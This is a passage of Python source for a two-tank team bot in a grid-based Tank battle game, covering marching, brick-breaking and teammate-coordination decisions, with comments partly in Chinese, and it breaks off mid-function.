                        _firstStatus = player.get_status().copy()  # routine copy here, in case there is no second route
                    returnAction = Action.STAY
                    continue  # stalled; keep looking at further routes

                # A move may be part of the "dodge away, then walk straight back"
                # deadlock ( 5cd009e0a51e681f0e8f3ffb ); use the previous turns'
                # statuses to break it here.
                #----------------------------------
                if (player.has_status_in_previous_turns(Status.WILL_DODGE_TO_LONG_WAY, turns=1)  # just dodged back last turn
                    and Action.is_move(realAction)  # and this turn we are about to walk back again
                    ):
                    # TODO: should we verify both encounters involve the same enemy?
                    #
                    # First, if there is a brick one gap ahead, dig through it.
                    # 5cd009e0a51e681f0e8f3ffb
                    if battler.will_destroy_a_brick_if_shoot(realAction):
                        field = battler.get_destroyed_fields_if_shoot(realAction)[0]
                        if (not battler.is_in_our_site(field)  # the brick must NOT be in our own half!
                            and battler.get_manhattan_distance_to(field) == 2
                            and battler.canShoot
                            ):
                            player.set_status(Status.KEEP_ON_MARCHING)  # true intent
                            returnAction = battler.shoot_to(field)
                            raise OUTER_BREAK
                    #player.add_label(Label.ALWAYS_DODGE_TO_LONG_WAY)  # would mark the tank if control reaches here

                # Look one step ahead: if moving would force us to dodge backwards
                # next turn, consider pre-breaking a brick one gap ahead instead
                # (similar to the active-defense logic).
                if Action.is_move(realAction):

                    if battler.is_face_to_enemy_base(ignore_brick=True):  # already aligned with the enemy base
                        with map_.simulate_one_action(battler, realAction):
                            if not battler.is_face_to_enemy_base(ignore_brick=True):
                                returnAction = Action.STAY  # do not move if it would break the alignment
                                raise OUTER_BREAK

                    if (not player.has_status(Status.DEFENSIVE)                # not in defensive mode
                        and battler.is_in_enemy_site()                         # only effective inside the enemy half!
                        and battler.will_destroy_a_brick_if_shoot(realAction)  # and shooting next turn would destroy a brick
                        ):
                        _needToBreakWallFirst = True
                        with map_.simulate_one_action(battler, realAction):
                            enemies = battler.get_enemies_around()
                            if len(enemies) == 0:  # no enemy, no prediction needed
                                _needToBreakWallFirst = False
                            else:
                                with outer_label() as OUTER_BREAK_2:
                                    route1 = battler.get_shortest_attacking_route()
                                    for enemy in battler.get_enemies_around():
                                        for action in battler.try_dodge(enemy):
                                            with map_.simulate_one_action(battler, action):
                                                route2 = battler.get_shortest_attacking_route()  # comparable only because route1 has delay = 0
                                                if route2.length <= route1.length:
                                                    # Some dodge keeps the route no
                                                    # longer than before, so no need
                                                    # to pre-break the wall.
                                                    _needToBreakWallFirst = False
                                                    raise OUTER_BREAK_2

                        if _needToBreakWallFirst:  # now try to break the wall
                            shootAction = realAction + 4
                            for field in battler.get_destroyed_fields_if_shoot(shootAction):
                                if isinstance(field, BrickField):
                                    if battler.get_manhattan_distance_to(field) == 2:  # brick one gap ahead
                                        if battler.canShoot:
                                            player.set_status(Status.WAIT_FOR_MARCHING)
                                            player.set_status(Status.READY_TO_CLEAR_A_ROAD_FIRST)
                                            returnAction = shootAction  # safety not re-checked
                                            raise OUTER_BREAK

                        if (_needToBreakWallFirst
                            and not battler.canShoot  # need to shoot but currently out of shells: wait
                            ):
                            player.set_status(Status.WAIT_FOR_MARCHING)
                            returnAction = Action.STAY
                            continue

                # If next turn both we and the enemy can shoot and two bricks lie
                # between us, shooting first avoids being pushed back — so when both
                # have shells, fire first.  5cea974dd2337e01c7add31f
                if (( player.has_status(Status.AGGRESSIVE) or player.has_status(Status.STALEMENT) )
                    and Action.is_move(realAction)
                    and battler.canShoot
                    ):
                    shootAction = realAction + 4
                    _hasEnemyBehindTwoBricks = False
                    oppBattler = None
                    destroyedFields = battler.get_destroyed_fields_if_shoot(shootAction)
                    if (len(destroyedFields) == 1
                        and isinstance(destroyedFields[0], BrickField)  # a brick directly ahead
                        and battler.get_enemy_behind_brick(shootAction, interval=-1) is None  # with nobody right behind it now
                        ):
                        with map_.simulate_one_action(battler, shootAction):
                            destroyedFields = battler.get_destroyed_fields_if_shoot(shootAction)
                            if len(destroyedFields) == 1 and isinstance(destroyedFields[0], BrickField):  # still a brick ahead
                                enemy = battler.get_enemy_behind_brick(shootAction, interval=-1)
                                if enemy is not None:  # an enemy sits behind the second brick
                                    _hasEnemyBehindTwoBricks = True
                                    oppBattler = BattleTank(enemy)

                    if _hasEnemyBehindTwoBricks:
                        if oppBattler.canShoot:  # the enemy can also shoot
                            player.set_status(Status.KEEP_ON_MARCHING)
                            returnAction = shootAction  # fire first this turn to avoid a standoff
                            raise OUTER_BREAK

                # All move actions must have been fully handled before this point!

                # In aggressive mode prefer shooting when it removes a wall on the
                # shortest route.
                #-------------------
                if (player.has_status(Status.AGGRESSIVE)
                    and Action.is_move(realAction)
                    and battler.canShoot
                    ):
                    shootAction = realAction + 4
                    for field in battler.get_destroyed_fields_if_shoot(shootAction):
                        if isinstance(field, BrickField) and field.xy in route:  # a brick on the shortest route can be destroyed
                            action = player.try_make_decision(shootAction)
                            if Action.is_shoot(action):
                                player.set_status(Status.KEEP_ON_MARCHING)
                                realAction = shootAction  # NOTE: rebinding realAction eases the later checks but is an ugly practice
                                break

                # Never break walls casually — it invites passivity!
                if Action.is_shoot(realAction):
                    # An enemy on the horizontal line behind the wall, within one
                    # gap ( 5cd33a06a51e681f0e91de95 ) — and in fact one gap is not
                    # enough ( 5cd35e08a51e681f0e92182e ).
                    _shouldStay = False
                    oppBattler = None

                    enemy = battler.get_enemy_behind_brick(realAction, interval=-1)
                    if enemy is not None:  # somebody behind the wall: do not shoot, wait instead
                        #---------------
                        player.set_risky_enemy(enemy)  # record this enemy!
                        player.set_status(Status.HAS_ENEMY_BEHIND_BRICK)
                        player.set_status(Status.WAIT_FOR_MARCHING)
                        _shouldStay = True

                    # The enemy may step behind the wall next turn.
                    if not _shouldStay:
                        with outer_label() as OUTER_BREAK_2:
                            for oppBattler in [ _oppPlayer.battler for _oppPlayer in player.opponents ]:
                                if oppBattler.destroyed:
                                    continue
                                for moveAction in oppBattler.get_all_valid_move_actions():
                                    with map_.simulate_one_action(oppBattler, moveAction):
                                        enemy = battler.get_enemy_behind_brick(realAction, interval=-1)
                                        if enemy is not None:  # it would then stand right behind the wall
                                            player.set_status(Status.WAIT_FOR_MARCHING)
                                            player.set_status(Status.ENEMY_MAY_APPEAR_BEHIND_BRICK)
                                            player.set_risky_enemy(enemy)  # still record it as the behind-wall enemy
                                            _shouldStay = True
                                            raise OUTER_BREAK_2

                    # Breaking the wall is not always forbidden — check whether the
                    # enemy is a real threat:
                    #   1. an enemy engaged with our teammate can be ignored         5ce209c1d2337e01c7a36a0a
                    #   2. an enemy wall-locked with our teammate can be ignored
                    #      (very likely situation)                                   5ce5678ed2337e01c7a79ace
                    #   3. an enemy in a standoff with our teammate can be ignored   5ce70df6d2337e01c7a98926
                    #   4. if the enemy has already visited the threatening cell,
                    #      it can be ignored                                         5ce266a1d2337e01c7a3cc90
                    if _shouldStay and oppBattler is not None:
                        teammateBattler = teammate.battler
                        oppTank = oppBattler.tank

                        # 1. the two of them face each other
                        for enemy in teammateBattler.get_enemies_around():
                            if enemy is oppTank:  # pinned by the teammate: ignorable
                                _shouldStay = False
                                break

                        # 2. wall standoff with the teammate
                        _action = teammateBattler.get_next_attacking_action()
                        if not Action.is_stay(_action):
                            enemy = teammateBattler.get_enemy_behind_brick(_action, interval=-1)
                            if enemy is oppTank:  # wall-locked with the teammate: ignorable
                                _shouldStay = False

                        # 3. standoff with the teammate
                        if teammateBattler.get_manhattan_distance_to(oppBattler) == 2:
                            _action = oppBattler.get_next_attacking_action()
                            with map_.simulate_one_action(oppBattler, _action):  # one simulated step later it meets the teammate
                                if teammateBattler.get_manhattan_distance_to(oppBattler) == 1:
                                    _shouldStay = False

                        # 4. the enemy has visited the threatening cell before (this
                        #    actually subsumes case 3).
                        # First locate the cell from which the enemy would threaten us.
                        _enemyRiskySite = None  # (x, y)
                        with map_.simulate_one_action(battler, realAction):
                            for _action in oppBattler.get_all_valid_move_actions():
                                with map_.simulate_one_action(oppBattler, _action):
                                    if battler.on_the_same_line_with(oppBattler):
                                        _enemyRiskySite = oppBattler.xy
                                        break

                        #assert _enemyRiskySite is not None  # it should always be found?

                        enemyAttackingRoute = oppBattler.get_shortest_attacking_route()

                        # Only count the cell as "already visited" when it is NOT on
                        # the enemy's attacking route; otherwise it may just be wall
                        # dancing.  5cec129e4742030582fac36d
                        if not _enemyRiskySite in enemyAttackingRoute:
                            with map_.auto_undo_revert() as counter:
                                while map_.revert():  # True while the rollback succeeds
                                    counter.increase()
                                    if oppBattler.xy == _enemyRiskySite:  # it has been there before
                                        _shouldStay = False
                                        break

                    if (_shouldStay
                        and player.has_status(Status.ENEMY_MAY_APPEAR_BEHIND_BRICK)
                        ):  # never break the wall in this situation!  5cec129e4742030582fac36d
                        returnAction = Action.STAY
                        continue

                    if _shouldStay:
                        # First try converting the shoot into a move.
                        #---------------
                        if Action.is_shoot(realAction):
                            moveAction = realAction - 4
                            action = player.try_make_decision(moveAction)
                            if Action.is_move(action):
                                returnAction = action
                                break

                    if _shouldStay:  # otherwise stay
                        returnAction = Action.STAY
                        continue

                # (inserted) Break the "always backing away" deadlock by dodging
                # to either side.  5ced9540641dd10fdcc79752
                if (oppBattler is not None  # needed to pass the automated tests -> TODO: maybe we should not re-decide for the enemy?
                    and player.has_label(Label.ALWAYS_BACK_AWAY)
                    and not battler.is_in_our_site(include_midline=True)  # strictly outside our own half
                    ):
                    for action in battler.try_dodge(oppBattler):
                        _realAction = player.try_make_decision(action)
                        if not Action.is_stay(_realAction):  # a passable dodge: take it directly
                            player.set_status(Status.TRY_TO_BREAK_ALWAYS_BACK_AWAY)
                            player.remove_labels(Label.ALWAYS_BACK_AWAY)  # the deadlock label is now broken
                            realAction = _realAction  # use the dodge direction as this turn's attack direction
                            break

                # Otherwise keep attacking.
                player.set_status(Status.KEEP_ON_MARCHING)
                returnAction = realAction
                raise OUTER_BREAK

            # endfor
        # endwith

        player.set_current_attacking_route(route)  # cache the attacking route

        # Now judge whether a non-first route was picked and whether that is
        # reasonable — turning around for no reason is just silly!
        # 5cee6727641dd10fdcc8dd96 -> 5cee6e3d641dd10fdcc8e8cf
        if (not _isFirstRoute                       # a non-first route was chosen
            and _firstPreventBeingKilled            # because the first one stalled to avoid death
            and Action.is_move(realAction)          # this route's action is a move
            and Action.is_move(_firstAttackAction)  # the first route's action was also a move
            and Action.is_opposite(realAction, _firstAttackAction)  # and they point in opposite directions!
            ):
            # In that case we should stop instead of walking away from the attack route.
            returnAction = Action.STAY
            player.remove_status(Status.KEEP_ON_MARCHING)
            player.set_status(*_firstStatus)
            player.set_current_attacking_route(_firstRoute)

        # An aggressive action was found.
        if not Action.is_stay(returnAction):
            return returnAction

        # Otherwise return STAY. If this matches what the first route decided,
        # restore the statuses captured during that first decision.
        if (_firstRealAction is not None
            and Action.is_stay(_firstRealAction)
            ):
            if _firstStatus is not None:
                player.set_status(*_firstStatus)
            player.set_current_attacking_route(_firstRoute)

        return Action.STAY

#{ END 'decision/single/marching.py' }#

#{ BEGIN 'decision/team/individual.py' }#

class IndividualTeamDecision(TeamDecisionMaker):
    """
    Each of the two players decides independently.
    This is the starting point of the team decision chain.
    """
    def _make_decision(self):
        team = self._team
        player1, player2 = team.players

        action1, _ = player1.make_decision()
        action2, _ = player2.make_decision()

        return [ action1, action2 ]

#{ END 'decision/team/individual.py' }#

#{ BEGIN 'decision/team/vital.py' }#

class VitalTeamDecision(TeamDecisionMaker):
    """
    Promote vital individual decisions to team decisions: the individual
    decision is taken as team-optimal, and lower-priority deciders further
    down the chain may not override it.
    """
    def _make_decision(self):
        team = self._team

        for player in team.players:
            if (   player.has_status(Status.SACRIFICE_FOR_OUR_BASE)   # about to sacrifice itself to defend our base
                or player.has_status(Status.BLOCK_ROAD_FOR_OUR_BASE)  # about to block the road to defend our base
                or player.has_status(Status.READY_TO_ATTACK_BASE)     # about to attack the enemy base
                or player.has_status(Status.READY_TO_KILL_ENEMY)      # about to kill an enemy
                ):
                # TODO: in the sacrifice case, dodging may still be worth
                #       considering  5ccca535a51e681f0e8c7131
                action = player.get_current_decision()
                player.set_team_decision(action)  # promote the individual decision to a team decision

        return [ player.get_current_decision() for player in team.players ]

#{ END 'decision/team/vital.py' }#

#{ BEGIN 'decision/team/leave_teammate.py' }#

class LeaveTeammateTeamDecision(TeamDecisionMaker):
    """
    Team decision for breaking an overlap with a teammate.
    Having our two tanks stacked on the same square is simply too wasteful ...
    """
    def _make_decision(self):
        team = self._team
        player1, player2 = team.players

        returnActions = [ player.get_current_decision() for player in team.players ]

        if player1.defeated or player2.defeated:
            # A teammate is already dead, so this situation cannot arise.
            return returnActions

        if player1.tank.xy == player2.tank.xy:
            if len([ action for action in returnActions if Action.is_move(action) ]) == 1:
                pass  # exactly one of them moves — the overlap resolves itself
            elif ( all( Action.is_move(action) for action in returnActions )
                and returnActions[0] != returnActions[1]
                ):
                # Both move, but in different directions — also acceptable.
                pass
            elif all([ player.has_team_decision() for player in team.players ]):
                pass  # both already carry a team order
            else:
                # The two stacked players are interchangeable; pick whichever one
                # does not yet have a team decision.
                if player1.has_team_decision():
                    player, idx = (player2, 1)
                else:
                    player, idx = (player1, 0)

                with player.create_snapshot() as manager:
                    action3, signal3 = player.make_decision(Signal.SHOULD_LEAVE_TEAMMATE)
                    if signal3 == Signal.READY_TO_LEAVE_TEAMMATE:
                        returnActions[idx] = action3
                        player.set_team_decision(action3)
                        manager.discard_snapshot()  # keep the re-decision's changes

        return returnActions

#{ END 'decision/team/leave_teammate.py' }#

#{ BEGIN 'decision/team/forced_attack.py' }#

class ForcedAttackTeamDecision(TeamDecisionMaker):
    """
    Forced-march signal
    ----------------
    Compensates for single-player decisions being overly conservative.

    While attacking, some "potentially dangerous" actions are in fact perfectly
    safe, yet the cautious single-player logic waits in place to avoid mistakes.
    That squanders the initiative and may even force a hasty (and hopeless)
    switch from attack to defense. The battlefield should therefore be analyzed
    for how large the potential risk really is; when there is effectively none,
    fire the forced-march signal so the attacker keeps advancing instead of
    over-avoiding risk.

    Situations worth firing the forced-march signal:

    1. Aggressive/stalemate mode stalled ("stop marching to avoid being
       killed") while:
       - the enemy is exchanging fire with our teammate: it can shoot this
         turn but will surely attack the teammate next turn;
       - the enemy is in a wall standoff with our teammate: it can shoot but
         does not, most likely stalling for time;
       - the enemy overlaps our teammate: it can shoot but keeps waiting for
         the teammate's decision.
    2.
       Aggressive/stalemate mode stalled while both sides have crossed the
       midline — the enemy clearly will not turn back to defend against you.
    """
    def _make_decision(self):
        team = self._team
        Tank2Player = type(team.players[0])

        returnActions = [ player.get_current_decision() for player in team.players ]

        for player in team.players:
            action = player.get_current_decision()
            if player.has_team_decision() or player.defeated:
                continue

            if ( player.has_status(Status.AGGRESSIVE)   # aggressive mode
                or player.has_status(Status.STALEMENT)  # stalemate mode
                ):
                if (action == Action.STAY                               # stalled this turn ...
                    and player.has_status(Status.WAIT_FOR_MARCHING)     # ... while waiting to march
                    and player.has_status(Status.PREVENT_BEING_KILLED)  # ... in order to avoid being killed
                    ):
                    _shouldForcedMarch = False

                    playerRiskyEnemyBattler = player.get_risky_enemy()
                    if playerRiskyEnemyBattler is None:  # presumably stalled for lack of ammo?
                        continue
                    oppPlayer = Tank2Player(playerRiskyEnemyBattler)
                    teammate = player.teammate  # consider the teammate's and the enemy's situation

                    #debug_print(player.get_risky_enemy())
                    #debug_print(teammate.get_risky_enemy())

                    # The enemy is exchanging fire with our teammate
                    #------------------
                    # In that case just advance.
                    if (oppPlayer.has_status(Status.ENCOUNT_ENEMY)
                        and oppPlayer.has_status(Status.READY_TO_FIGHT_BACK)
                        and oppPlayer.get_risky_enemy() is teammate.battler
                        ):  # the enemy is about to trade shots with our teammate
                        _shouldForcedMarch = True

                    # The enemy is in a wall standoff with our teammate
                    #----------------------
                    # If the standoff has lasted more than one turn, we have
                    # conservatively waited one turn already; since the enemy did
                    # not attack us, it either cares more about the standoff or is
                    # deliberately stalling — so attack directly.
                    elif (oppPlayer.has_status(Status.HAS_ENEMY_BEHIND_BRICK)  # standoff for over a turn
                        and oppPlayer.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1)
                        and oppPlayer.get_risky_enemy() is teammate.battler
                        and player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1)  # we already waited a turn
                        and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1)
                        ):
                        _shouldForcedMarch = True

                    # The enemy overlaps our teammate
                    #----------------------------
                    # Same reasoning: after it stayed overlapped for over a turn
                    # and did not attack us, it clearly cares more about the
                    # overlap — advance directly.
                    elif (oppPlayer.has_status(Status.OVERLAP_WITH_ENEMY)  # overlapped for over a turn
                        and oppPlayer.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1)
                        and player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1)  # we already waited a turn
                        and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1)
                        ):
                        _shouldForcedMarch = True

                    # Both sides crossed the midline
                    #-----------------------------
                    # Stop countering and attack directly?
                    # TODO: there exist bots that attack with one tank and defend
                    #       with the other.

                    if _shouldForcedMarch:  # forced march is recommended
                        with player.create_snapshot() as manager:
                            action3, signal3 = player.make_decision(Signal.FORCED_MARCH)
                            if Signal.is_break(signal3):
                                continue
                            if signal3 == Signal.READY_TO_FORCED_MARCH:
                                returnActions[player.id] = action3
                                player.set_team_decision(action3)
                                player.set_status(Status.FORCED_MARCHING)
                                manager.discard_snapshot()

        return returnActions

#{ END 'decision/team/forced_attack.py' }#

#{ BEGIN 'decision/team/break_brick.py' }#

class BreakBrickTeamDecision(TeamDecisionMaker):
    """
    Team decision for proactively breaking a brick wall.
    -----------------
    Breaking walls at random is forbidden for a lone player,
    but conditional, team-coordinated wall-breaking is allowed.
    """
    def _make_decision(self):
        team = self._team
        Tank2Player = type(team.players[0])

        returnActions = [ player.get_current_decision() for player in team.players ]

        for player in team.players:
            action = player.get_current_decision()
            if player.has_team_decision() or player.defeated:
                continue

            if (Action.is_stay(action)                                # staying this turn ...
                and player.has_status(Status.HAS_ENEMY_BEHIND_BRICK)  # ... because an enemy hides behind a brick
                and player.has_status(Status.WAIT_FOR_MARCHING)       # ... so the march is on hold
                #and not player.has_status(Status.DEFENSIVE)          # do not let a defensive teammate break walls at will
                and not player.has_status(Status.RELOADING)           # currently has a shell
                # and self.has_status_in_previous_turns(player, Status.WAIT_FOR_MARCHING, turns=1)  # changed: prepare an escape route as soon as possible
                ):
                # Trigger: one player is wall-locked with an enemy and the teammate
                # is pinned down by that standoff.
                #----------------------------------------------------
                # The stalemated side breaks the wall first, keeping a way out.
                #----------------------
                with player.create_snapshot() as manager:
                    action3, signal3 = player.make_decision(Signal.PREPARE_FOR_BREAK_BRICK)
                    if Signal.is_break(signal3):
                        continue

                    if signal3 == Signal.READY_TO_PREPARE_FOR_BREAK_BRICK:  # will dig through the wall next turn
                        returnActions[player.id] = action3
                        player.set_team_decision(action3)
                        manager.discard_snapshot()
                        continue  # this member's decision is final; it digs this turn

                    # elif signal3 == Signal.READY_TO_BREAK_BRICK:  # otherwise a break-brick signal arrives; check the conditions
                    elif signal3 == Signal.READY_TO_BREAK_BRICK:
                        oppBattler = player.get_risky_enemy()  # the enemy behind the wall
                        assert oppBattler is not None  # there must be a risky enemy
                        oppPlayer = Tank2Player(oppBattler)
                        # playerIdx   = idx
                        # teammateIdx = 1 - idx
                        teammate = player.teammate

                        _shouldBreakBrick = False

                        if oppBattler.has_enemy_around():
                            # The enemy met our teammate — break the wall immediately.
                            _shouldBreakBrick = True

                        ''' 这个两个触发已经不再需要了 5ce217e8d2337e01c7a3790c

                        # TODO:
                        #   这种情况挺难遇到的,而且一旦遇到一般都为时过晚
                        #   应该要模拟地图预测一下,提前开一炮
                        #
                        if (teammate.has_status(Status.WAIT_FOR_MARCHING)  # 队友等待
                            # and self.has_status_in_previous_turns(teammate, Status.WAIT_FOR_MARCHING, turns=1)
                            and teammate.has_status(Status.PREVENT_BEING_KILLED)  # 队友是为了防止被杀
                            ):
                            teammateRiskyEnemyBattler = teammate.get_risky_enemy()
                            playerRiskyEnemyBattler = player.get_risky_enemy()  # 墙后敌人
                            if teammateRiskyEnemyBattler is playerRiskyEnemyBattler:
                                # 两者受到同一个敌人牵制,那么发动破墙信号
                                _shouldBreakBrick = True

                        elif ( teammate.has_status(Status.AGGRESSIVE)
                            or teammate.has_status(Status.STALEMENT)
                            ):
                            teammateAction = returnActions[ teammateIdx ]
                            if (Action.is_move(teammateAction)  # 确保队友动作为移动
                                and teammate.has_status(Status.KEEP_ON_MARCHING)  # 队友正在行军
                                ):
                                # 尝试模拟下一回合的队友状态,并让队友重新决策,查看他的状态
                                with map_.simulate_one_action(teammate, teammateAction):
                                    action4, _ = teammate.make_decision()
                                    if (teammate.has_status(Status.WAIT_FOR_MARCHING)
                                        and teammate.has_status(Status.PREVENT_BEING_KILLED)
                                        ):  # 这个时候队友被阻拦
                                        teammateRiskyEnemyBattler = teammate.get_risky_enemy()
                                        playerRiskyEnemyBattler = player.get_risky_enemy()
                                        if teammateRiskyEnemyBattler is playerRiskyEnemyBattler:
                                            _shouldBreakBrick = True  # 如果是因为对面墙的坦克在阻拦,那么马上破墙'''

                        # If the opponent is about to trade shots with our teammate
                        # ( 5cd364e4a51e681f0e921e7a ), consider breaking the wall
                        # directly: the enemy must fire back this turn or its
                        # defense is pointless, after which it is two-versus-one
                        # with nobody loaded. If it then stays, we finish it two on
                        # one; if it moves, the attacked teammate is freed and can
                        # keep advancing.
                        if (not teammate.has_status(Status.DEFENSIVE)
                            and teammate.has_status(Status.ENCOUNT_ENEMY)
                            and teammate.has_status(Status.READY_TO_FIGHT_BACK)
                            ):
                            teammateRiskyEnemyBattler = teammate.get_risky_enemy()
                            playerRiskyEnemyBattler = player.get_risky_enemy()
                            if teammateRiskyEnemyBattler is playerRiskyEnemyBattler:
                                _shouldBreakBrick = True

                        if _shouldBreakBrick:
                            returnActions[player.id] = action3
                            player.set_team_decision(action3)
                            manager.discard_snapshot()
                            continue

        return returnActions

#{ END 'decision/team/break_brick.py' }#

#{ BEGIN 'decision/team/back_to_help.py' }#

class BackToHelpTeamDecision(TeamDecisionMaker):
    """
    Back away behind the wall to help a teammate  5cea650cd2337e01c7ad8de4
    This can create a two-on-one situation.

    TODO:
      backing away may itself lead to a WITHDRAW situation?
    """
    def _make_decision(self):
        team = self._team
        map_ = team._map
        Tank2Player = type(team.players[0])

        returnActions = [ player.get_current_decision() for player in team.players ]

        for player in team.players:
            action = player.get_current_decision()
            if player.has_team_decision() or player.defeated:
                continue

            teammate = player.teammate
            teammateBattler = teammate.battler

            if (player.has_status(Status.HAS_ENEMY_BEHIND_BRICK)
                and teammate.has_status(Status.WITHDRAW)
                and teammate.has_status(Status.ENCOUNT_ENEMY)
                and (teammate.has_status(Status.READY_TO_FIGHT_BACK)
                    or teammate.has_status_in_previous_turns(Status.READY_TO_FIGHT_BACK, turns=1)
                    )  # keeps a shot-trading posture
                # TODO: maybe a dedicated "trading shots" status should describe
                #       this withdrawing shot-exchange?
                ):
                battler = player.battler
                oppBattler = player.get_risky_enemy()
                if oppBattler is None:  # 5cee87fc641dd10fdcc91b44 why a null pointer here ???
                    continue
                oppPlayer = Tank2Player(oppBattler)
                teammateRiskyEnemyTank = oppPlayer.teammate.tank  # teammate of the enemy currently wall-locked with me

                if oppBattler is not None and teammateRiskyEnemyTank is not None:  # should never fail?
backAwayAction = battler.back_away_from(oppBattler) _shouldBackAway = False with map_.auto_revert() as counter: while map_.is_valid_move_action(battler, backAwayAction): map_.single_simulate(battler, backAwayAction) counter.increase() if teammateRiskyEnemyTank in battler.get_enemies_around(): _shouldBackAway = True break if _shouldBackAway: with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.SUGGEST_TO_BACK_AWAY_FROM_BRICK) if Signal.is_break(signal3): continue if signal3 == Signal.READY_TO_BACK_AWAY_FROM_BRICK: returnActions[player.id] = action3 player.set_team_decision(action3) continue return returnActions #{ END 'decision/team/back_to_help.py' }# #{ BEGIN 'decision/team/prevent_team_hurt.py' }# class PreventTeamHurtTeamDecision(TeamDecisionMaker): """ 防止队员自残 -------------- 在决策链的最后,判断是否出现队友恰好打掉准备移动的队友的情况,并加以协调 """ def _make_decision(self): team = self._team map_ = team._map oppBase = map_.bases[1 - team.side] player1, player2 = team.players returnActions = [ player.get_current_decision() for player in team.players ] if player1.defeated or player2.defeated: # 有队友已经挂了,没必要考虑这个情况 return returnActions action1, action2 = returnActions _mayShouldForcedStop = False if Action.is_shoot(action1) and Action.is_move(action2): shootAction = action1 shootPlayer = player1 moveAction = action2 movePlayer = player2 _mayShouldForcedStop = True elif Action.is_move(action1) and Action.is_shoot(action2): shootAction = action2 shootPlayer = player2 moveAction = action1 movePlayer = player1 _mayShouldForcedStop = True if _mayShouldForcedStop: moveBattler = movePlayer.battler shootBattler = shootPlayer.battler _shouldForcedStop = False with map_.simulate_one_action(moveBattler, moveAction): with map_.simulate_one_action(shootBattler, shootAction): if moveBattler.destroyed: # 刚好把队友打死 ... _shouldForcedStop = True if _shouldForcedStop: # # TODO: # 如何决策? # 改动射击和决策都有可能很危险 # # # 这里先做一个特殊情况,那就是重叠攻击基地,这种情况将移动的队友视为不移动 # # TODO: # 好吧,这种情况和主动和队友打破重叠的行为是相斥的 ... 
# '''if (moveBattler.xy == shootBattler.xy and moveBattler.is_face_to_enemy_base(ignore_brick=False) and shootBattler.is_face_to_enemy_base(ignore_brick=False) ): returnActions[movePlayer.id] = Action.STAY hasTeamActions[movePlayer.id] = True''' # # 先判断这种情况 5ce92f70d2337e01c7abf587 #----------------- # # 默认让射击队友停下 #-------------------- stayID = shootBattler.id stopPlayer = shootPlayer # # 以下情况,应该让 moveBattler 停下来 # # 1. 射击队友正在和敌人对射 # 2. 射击队员正面向敌人基地(为了触发团队协作) # # 其他更有待补充 ... # if (shootPlayer.has_status(Status.READY_TO_FIGHT_BACK) or shootPlayer.battler.on_the_same_line_with(oppBase, ignore_brick=True) ): stayID = moveBattler.id stopPlayer = movePlayer stopPlayer.set_status(Status.FORCED_STOP_TO_PREVENT_TEAM_HURT) returnActions[stayID] = Action.STAY stopPlayer.set_current_decision(Action.STAY) stopPlayer.set_team_decision(Action.STAY) return returnActions #{ END 'decision/team/prevent_team_hurt.py' }# #{ BEGIN 'decision/team/cut_through_midline.py' }# class CutThroughMidlineTeamDecision(TeamDecisionMaker): """ 当我方队员与敌人在墙后僵持,并且不得不选择等待的时候 考虑是否可以打通土墙,因为这个时候也许可以干扰另一路敌人的进攻路线 """ def _make_decision(self): team = self._team map_ = team._map base = map_.bases[team.side] Tank2Player = type(team.players[0]) returnActions = [ player.get_current_decision() for player in team.players ] for player in team.players: # # 保守起见,先等待一回合 # # TODO: # 有可能延误战机! 
5ced7ce1641dd10fdcc776b1 # 这样才是对的 5ced7d66641dd10fdcc777ae # # if not player.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1): # continue with outer_label() as OUTER_CONTINUE: action = player.get_current_decision() tank = player.tank battler = player.battler if player.has_team_decision() or player.defeated: continue if (Action.is_stay(action) # 当前回合处于等待状态 and player.has_status(Status.HAS_ENEMY_BEHIND_BRICK) # 墙后有人造成的 and player.has_status(Status.WAIT_FOR_MARCHING) # 因此等待行军 and battler.canShoot # 必须要能够射击 and battler.is_near_midline() # 只有中线附近的队友才会触发这个攻击条件 ): _oppBattler = player.get_risky_enemy() _oppPlayer = Tank2Player(_oppBattler) # 实际考虑的是它的队员! oppPlayer = _oppPlayer.teammate oppBattler = oppPlayer.battler oppTank = oppBattler.tank if oppPlayer.defeated: # 对方已经输了,就不用管了 ... continue x1, y1 = battler.xy dx = np.sign( base.x - x1 ) x2 = x1 + dx y2 = y1 shootAction = Action.get_shoot_action(x1, y1, x2, y2) if battler.will_destroy_a_brick_if_shoot(shootAction): # 将会打掉一个砖块 field = battler.get_destroyed_fields_if_shoot(shootAction)[0] # # 首先判断这一步射击是否会阻止敌人的移动 # enemyAttackingRoute = oppBattler.get_shortest_attacking_route() oppAction = oppBattler.get_next_attacking_action(enemyAttackingRoute) oppRealAction = oppPlayer.try_make_decision(oppAction) if (Action.is_move(oppAction) and Action.is_stay(oppRealAction) and oppPlayer.get_risky_enemy() is battler ): # 敌人下回合打算行军,但是受到我方坦克的影响而停止 continue # 那就算了 # # 判断是否摧毁了敌人进攻路线上的块 # _dx = np.sign( base.x - field.x ) # 首先判断这个块是否和当前坦克处在不同测的地图上 if _dx != 0 and _dx != dx: # _dx == 0 表示 x = 4 中线的墙可以打掉 if field.xy in enemyAttackingRoute: continue # 不要打掉这个块? # # 防止出现我方坦克打掉一个块,对方可以突然出现在 field 前 # for enemyMoveAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_multi_actions((battler, shootAction), (oppBattler, enemyMoveAction)): if oppBattler.destroyed: # 好吧,还是要判断一下这种情况的 ... 
